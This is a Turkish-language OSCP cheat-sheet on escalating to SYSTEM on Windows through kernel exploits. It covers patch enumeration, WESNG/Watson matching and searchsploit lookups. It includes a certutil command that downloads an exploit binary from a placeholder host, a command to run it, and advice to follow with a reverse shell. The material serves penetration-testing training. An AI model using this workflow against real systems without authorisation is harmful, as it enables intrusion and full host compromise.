FOOTHOLD Metodoloji Cheat-sheet
PrivEsc ✓ EXAM-SAFE zor

Windows Kernel Exploit Metodolojisi (systeminfo → WESNG → searchsploit)

Yapısal yol kapalıysa son çare kernel exploit. systeminfo / KB listesini al, WESNG (Windows-Exploit-Suggester-NG) veya Watson ile eksik patch'leri eşle, searchsploit/GitHub'dan precompiled binary bul, çalıştır. OSCP'de kernel exploit dikkatli ve son sırada kullanılır.

Bilgi: ÖN KOŞULLAR
  • Yapısal privesc (servis, token, registry) yolları tükenmiş olmalı
  • systeminfo veya hotfix (KB) listesine erişim
┌──

Komutlar

cmd ✓ EXAM-SAFE user
systeminfo
OS sürümü, build, mimari ve yüklü hotfix (KB) listesini al — WESNG'nin temel girdisi. HackTricks — Windows Local Privilege Escalation (System Info)
cmd ✓ EXAM-SAFE user
wmic qfe get Caption,Description,HotFixID,InstalledOn
Yüklü güvenlik güncellemelerini (KB) listele; systeminfo hotfix kısmı boşsa alternatif. HackTricks — Windows PrivEsc (wmic qfe)
PowerShell ✓ EXAM-SAFE user
Get-HotFix | Sort-Object InstalledOn -Descending
PowerShell ile yüklü patch'leri tarih sıralı listele. Microsoft Docs — Get-HotFix; HackTricks
wesng ✓ EXAM-SAFE
wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only
Kali'de systeminfo çıktısını WESNG'ye ver; sadece privesc (EoP) ve PoC'u olan açıkları filtrele. Windows-Exploit-Suggester-NG (bitsadmin/wesng)
wesng ✓ EXAM-SAFE
wes.py --update && wes.py systeminfo.txt
WESNG veritabanını güncelle, sonra eksik patch'lere karşılık gelen CVE'leri çıkar. Windows-Exploit-Suggester-NG — README
Watson ✓ EXAM-SAFE user
Watson.exe
Hedef üzerinde çalışan .NET tabanlı in-memory eksik-patch tarayıcı (modern Windows 10/Server 2016+). Watson (rasta-mouse) — HackTricks Windows PrivEsc
searchsploit ✓ EXAM-SAFE
searchsploit windows kernel local privilege escalation
WESNG/Watson'ın verdiği CVE/MS numarasına karşılık local exploit kodu ara. Exploit-DB searchsploit; OffSec PWK guide
searchsploit ✓ EXAM-SAFE
searchsploit -m windows/local/<edb-id>
Bulduğun exploit'i çalışma dizinine mirror'la (kaynak/derlenebilir). Exploit-DB searchsploit -m
certutil (transfer) ✓ EXAM-SAFE user
certutil -urlcache -split -f {{URL}}/exploit.exe C:\Temp\exploit.exe
Precompiled kernel exploit binary'sini hedefe indir (LOLBAS). LOLBAS — Certutil.exe; HackTricks file transfer
cmd ✓ EXAM-SAFE user
C:\Temp\exploit.exe "cmd /c whoami"
Kernel exploit'i çalıştır; çoğu SYSTEM bağlamında komut çalıştırma argümanı alır (önce whoami ile doğrula). HackTricks — Windows Kernel Exploits

Kernel Exploit = Son Çare

Kernel exploit’ler güçlüdür ama kırılgandır: yanlış sürümde sistemi mavi ekrana (BSOD) düşürebilir, hizmeti çökerterek hedefi bozabilir ve OSCP’de bu sana ceza yazdırır. Bu yüzden metodoloji nettir: önce yapısal/konfigürasyon tabanlı yolları (yanlış servis izinleri, unquoted path, token privilege, AlwaysInstallElevated, stored creds, scheduled task) tüket. Hiçbiri yoksa ve sistem belirgin şekilde patch’siz/eski ise kernel exploit’e dön.

Adım 1 — Bilgi Toplama (Fingerprinting)

Çekirdek versiyonunu ve yüklü yamaları çıkarmadan exploit seçemezsin. systeminfo sana OS Name, Version, build numarası, mimari (x64/x86) ve Hotfix(s) listesini verir. Hotfix listesi boşsa (N/A) sistem muhtemelen hiç güncellenmemiş demektir — bu zaten kuvvetli bir sinyal. wmic qfe ve Get-HotFix aynı KB bilgisini farklı yollarla verir; biri kısıtlanmışsa diğerini kullan.

Adım 2 — Eksik Patch’leri Eşleme

WESNG (önerilen, offline)

Hedefteki systeminfo çıktısını bir dosyaya kaydet, Kali’ye taşı ve wes.py systeminfo.txt çalıştır. WESNG yüklü KB’leri Microsoft güvenlik bülteni veritabanıyla karşılaştırıp eksik olanlara karşılık gelen CVE’leri listeler. -i 'Elevation of Privilege' --exploits-only ile sadece privesc’e yarayan ve public PoC’u olanları filtrele — gürültüyü ciddi azaltır. Çalıştırmadan önce wes.py --update ile DB’yi tazele.

Watson (modern, on-host)

Watson, Windows 10 / Server 2016+ üzerinde .NET ile in-memory çalışan bir tarayıcıdır; systeminfo parse etmek yerine doğrudan sistemin patch durumunu okuyup bilinen EoP açıklarını işaret eder. WESNG’nin çok eski Windows’larda daha iyi olduğunu, Watson’ın ise modern sistemlerde daha isabetli olduğunu unutma. (Not: Sherlock artık deprecated, yerine Watson kullanılır.)

Adım 3 — Exploit Bulma ve Derleme

WESNG/Watson sana bir MS-numarası (örn. MS16-032) veya CVE verir. searchsploit ile Exploit-DB’de eşleşen local exploit’i ara, searchsploit -m ile mirror’la. Mümkünse precompiled binary kullan — kernel exploit’leri Kali’de mingw ile cross-compile etmek zaman alır ve hata yapmak kolaydır. SecWiki/abatchy gibi public ‘Windows Kernel Exploits’ repo’larında derlenmiş .exe’ler bulunur. Hangi binary’yi seçtiysen mimariyle (x86/x64) eşleştir.

Adım 4 — Transfer ve Çalıştırma

Binary’yi certutil, SMB, ya da bir HTTP sunucusu üzerinden hedefe taşı (bkz. help-transfer). Çoğu modern kernel exploit bir komut argümanı alır (exploit.exe "cmd /c whoami"); önce zararsız whoami ile doğru çalıştığını ve gerçekten SYSTEM döndürdüğünü teyit et, ancak ondan sonra reverse shell tetikle. Bu, BSOD riskini test ederken hasarı sınırlar.

OSCP Disiplin Notu

  • Tüm enumeration/suggester araçları safe; otomatik sömürü değildir. Asıl risk exploit’in kendisindedir, aracın değil.
  • Bir makinede birden fazla kernel exploit denemesi sistemi kalıcı olarak bozabilir; her denemeden önce snapshot/revert düşünülmeli. Exam’da bir makineyi kilitlemek pahalıdır.
  • Metasploit’in local_exploit_suggester ve otomatik kernel modülleri restricted kabul edilir — manuel WESNG + manuel binary tercih et.
  • Çekirdek son çaredir: rapor/notlarında neden yapısal yolların kapalı olduğunu da belgele.
┌──

Kaynaklar

↗ HackTricks — Windows Local Privilege Escalation (Kernel Exploits)↗ Windows-Exploit-Suggester-NG (WESNG)↗ Watson — .NET missing-patch enumerator
0/15 set